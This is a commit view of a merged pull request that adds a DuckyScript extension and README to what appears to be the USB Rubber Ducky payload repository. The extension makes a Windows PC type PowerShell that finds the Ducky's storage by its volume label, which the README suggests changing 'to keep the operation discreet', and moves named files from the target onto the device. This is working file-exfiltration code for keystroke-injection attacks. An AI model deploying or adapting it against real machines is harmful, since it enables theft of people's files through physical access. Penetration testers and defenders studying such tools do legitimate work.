Merge pull request #427 from aleff-github/patch-83

Extension: SAVE FILES IN RUBBER DUCKY STORAGE
2024-08-20 17:04:28 -04:00 · 2024-08-20 17:04:28 -04:00 · 404640f615
parent 5c1ec51393 9e6b405745
commit 404640f615
2 changed files with 171 additions and 0 deletions
--- a/payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/README.md
+++ b/payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/README.md
@ -0,0 +1,103 @@
+# Save Files In Rubber Ducky Storage - Windows
+
+This extension can be used to save one or more files through the USB Rubber Ducky storage without having to copy and paste reused code every time, but standardizing a methodology that avoids errors.
+
+```
+How many files do you want to save?
+|
+|-- Single File
+|   |
+|   |-- Do you already know the full file path? (e.g., C:\Users\Aleff\Downloads\photo.png)
+|   |   |
+|   |   |-- Use the SINGLE_FILE version
+|   |   |   |
+|   |   |   |-- Set #FLAG_SINGLE_FILE to TRUE
+|   |   |   |-- Define the file path in #SINGLE_PATH
+|   |   |
+|   |-- Don't know the full path but can obtain it at runtime through PowerShell?
+|   |   |
+|   |   |-- Use the $fileToSavePath variable
+|   |   |   |
+|   |   |   |-- Set #FLAG_SINGLE_FILE to TRUE
+|   |   |   |-- Obtain the file path through PowerShell and assign it to $fileToSavePath
+|
+|-- Multiple Files
+|   |
+|   |-- Set the #FLAG_SINGLE_FILE variable to FALSE
+|   |   |
+|   |   |-- Use an array of strings named $fileToSavePaths to collect the paths of all the files you want to use
+
+```
+
+
+## Target Environment
+
+- **Target**: Windows PowerShell
+
+## Usage
+
+Insert this extension when you have one or more files that you want to save via USB Rubber Ducky storage.
+
+## Configuration
+
+Before using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options:
+
+### Driver Label
+
+This extension utilizes the 'Get-Volume' command to scan the available volumes on the computer where the command is executed, aiming to detect our USB Rubber Ducky device. Upon detection, the device is selected to serve as a reference, allowing us to perform data saving operations. By default, USB Rubber Duckys are identified by the label 'DUCK'. However, this label can be altered, particularly if we want to keep the operation discreet. If the default label has been changed, it will be necessary to update the #DRIVER_LABEL variable with the correct label.
+
+### Single File or Multiple Files
+
+You can choose to send a single file or multiple files. Configure the extension accordingly.
+
+#### Single File Configuration
+
+- **Variable**: #FLAG_SINGLE_FILE
+- **Type**: Boolean (TRUE or FALSE)
+- **Description**: Set #FLAG_SINGLE_FILE to TRUE if you want to save just one file. In this case, you will need to specify the file path within the #SINGLE_PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $fileToSavePath variable.
+
+Example in DuckyScript:
+```DuckyScript
+DEFINE #FLAG_SINGLE_FILE TRUE
+DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
+```
+
+Example in PowerShell before using the extension:
+```powershell
+$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
+```
+
+#### Multiple Files Configuration
+
+- **Variable**: #FLAG_SINGLE_FILE
+- **Type**: Boolean (TRUE or FALSE)
+- **Description**: Set #FLAG_SINGLE_FILE to FALSE if you want to save multiple files. In this case, in PowerShell, you will have to create the variable $fileToSavePaths, which is an array of strings containing the list of paths related to the files you want to export.
+
+Example in PowerShell before using the extension:
+```powershell
+$fileToSavePaths = @(
+    "C:\Users\Aleff\Downloads\photo.png",
+    "C:\Users\Aleff\Downloads\document.pdf",
+    "C:\Users\Aleff\Downloads\song.mp3"
+)
+```
+
+**Tips for Working with Arrays in PowerShell:**
+
+- How to create an array:
+  ```powershell
+  $fileToSavePaths = @()
+  ```
+
+- How to add an element to the array:
+  ```powershell
+  $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
+  ```
+
+- How to view the array:
+  ```powershell
+  $fileToSavePaths
+  ```
+
+That's it! You can now use this extension with the appropriate configuration to save files via the USB Rubber Ducky storage using the same USB Rubber Ducky.
+
--- a/payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS.txt
+++ b/payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS.txt
@ -0,0 +1,68 @@
+EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS
+    REM VERSION 1.0
+    REM AUTHOR: Aleff
+    REM_BLOCK Documentation
+        This extension is used to save one or more files through the USB Rubber Ducky storage.
+
+        TARGET:
+            Windows 10/11
+
+        USAGE:
+            Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.
+
+        CONFIGURATION:
+            Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.
+
+            Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.
+            In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.
+                i.e. in DuckyScript EXTENSION
+                    DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
+                i.e. in PowerShell before extension
+                    $fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
+
+            Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.
+            In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.
+                i.e. in PowerShell before extension:
+                    $fileToSavePaths = @(
+                        "C:\Users\Aleff\Downloads\photo.png",
+                        "C:\Users\Aleff\Downloads\document.pdf",
+                        "C:\Users\Aleff\Downloads\song.mp3"
+                    )
+                Some tips:
+                    How to create an Array?
+                        > $fileToSavePaths = @()
+                    How to add an element?
+                        > $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
+                    How to see the array?
+                        > $fileToSavePaths
+    END_REM
+    REM Settings
+    DEFINE #DRIVER_LABEL DUCK
+    DEFINE #FLAG_SINGLE_FILE FALSE
+    DEFINE #SINGLE_PATH 0
+
+    REM Extension Code
+    FUNCTION SAVE_SINGLE_FILE()
+        IF ( #SINGLE_PATH != 0 ) THEN
+            STRINGLN mv #SINGLE_PATH >> ${m}:\
+        ELSE IF ( #SINGLE_PATH == 0 ) THEN
+            STRINGLN mv ${fileToSavePath} >> ${m}:\
+        END_IF
+    END_FUNCTION
+
+    FUNCTION SAVE_MULTIPLE_FILES()
+        STRINGLN
+            foreach ($fileToSavePath in $fileToSavePaths) {
+                mv ${fileToSavePath} >> ${m}:\
+            }
+        END_STRINGLN
+    END_FUNCTION
+
+    STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;
+    IF_DEFINED_TRUE #FLAG_SINGLE_FILE
+        SAVE_SINGLE_FILE()
+    END_IF_DEFINED
+    IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE
+        SAVE_MULTIPLE_FILES()
+    END_IF_DEFINED
+END_EXTENSION